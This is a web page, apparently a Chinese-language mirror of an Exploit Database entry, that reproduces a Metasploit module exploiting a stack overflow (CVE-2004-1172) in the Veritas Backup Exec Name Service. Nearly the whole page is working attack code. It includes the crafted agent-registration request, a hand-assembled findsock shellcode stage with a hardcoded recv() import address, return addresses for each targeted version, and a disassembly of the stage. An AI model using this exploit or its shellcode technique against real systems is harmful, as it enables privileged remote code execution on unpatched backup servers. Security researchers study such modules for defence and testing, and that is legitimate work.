Veritas Backup Exec Name Service – Remote Overflow (Metasploit)

• Exploit Database
• 124 阅读

• 作者： Metasploit
  日期： 2010-06-22
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16331/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147

  ## # $Id: name_service.rb 9583 2010-06-22 19:11:05Z todb $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking   include Msf::Exploit::Remote::Tcp   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Veritas Backup Exec Name Service Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a vulnerability in the Veritas Backup Exec Agent Browser service. This vulnerability occurs when a recv() call has a length value too long for the destination stack buffer. By sending an agent name value of 63 bytes or more, we can overwrite the return address of the recv function. Since we only have ~60 bytes of contiguous space for shellcode, a tiny findsock payload is sent which uses a hardcoded IAT address for the recv() function. This payload will then roll the stack back to the beginning of the page, recv() the real shellcode into it, and jump to it. This module has been tested against Veritas 9.1 SP0, 9.1 SP1, and 8.6. }, &apos;Author&apos; => [ &apos;hdm&apos; ], &apos;License&apos;=> MSF_LICENSE, &apos;Version&apos;=> &apos;$Revision: 9583 $&apos;, &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2004-1172&apos;], [ &apos;OSVDB&apos;, &apos;12418&apos;], [ &apos;BID&apos;, &apos;11974&apos;], [ &apos;URL&apos;, &apos;http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities&apos;], ], &apos;Privileged&apos; => true, &apos;Payload&apos;=> { &apos;Space&apos;=> 1024, &apos;MinNops&apos;=> 512, &apos;MinNops&apos;=> 512, &apos;StackAdjustment&apos; => -3500, }, &apos;Targets&apos;=> [ [ &apos;Veritas BE 9.1 SP0/SP1&apos;, # BackupExec 9.1 SP0/SP1 return contributed by class101 { &apos;Platform&apos; => &apos;win&apos;, &apos;Rets&apos; => [ 0x0142ffa1, 0x401150FF ], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe }, ], [ &apos;Veritas BE 8.5&apos;, { &apos;Platform&apos; => &apos;win&apos;, &apos;Rets&apos; => [ 0x014308b9, 0x401138FF ], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572 }, ], ], &apos;DisclosureDate&apos; => &apos;Dec 16 2004&apos;, &apos;DefaultTarget&apos; => 0))   register_options( [ Opt::RPORT(6101) ], self.class) end   def exploit connect   print_status("Trying target #{target.name}...")   # This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv) # The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid # nulls: [0x00401150 -> 0x401150FF] stage_code = "\xfc" * 112 stage_read = "\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+ "\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+ "\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"   # Configure the IAT for the recv call stage_read[29, 4] = [ target[&apos;Rets&apos;][1] ].pack(&apos;V&apos;)   # Stuff it all into one request stage_code[2, stage_read.length] = stage_read   # Create the registration request req = "\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+ "1.1.1.1.1.1\x00" + "\xeb\x81"   print_status("Sending the agent registration request of #{req.length} bytes...") sock.put(req)   print_status("Sending the payload stage down the socket...") sock.put(payload.encoded)   print_status("Waiting for the payload to execute...") select(nil,nil,nil,2)   handler disconnect end   end     __END__ [ findsock stage ] 0000000031F6xor esi,esi 00000002C1EC0Cshr esp,0xc 00000005C1E40Cshl esp,0xc 0000000889E7mov edi,esp 0000000A89FBmov ebx,edi 0000000C6A01push byte +0x1 0000000E8B7424FEmov esi,[esp-0x2] 0000001231D2xor edx,edx 0000001452push edx 0000001542inc edx 00000016C1E210shl edx,0x10 0000001952push edx 0000001A57push edi 0000001B56push esi 0000001CB8FF501140mov eax,0x401150ff 00000021C1E808shr eax,0x8 00000024FF10call near [eax] 0000002685C0test eax,eax 000000287907jns 0x31 0000002A89DCmov esp,ebx 0000002C4Edec esi 0000002D85F6test esi,esi 0000002F75E1jnz 0x12 00000031FFD7call edi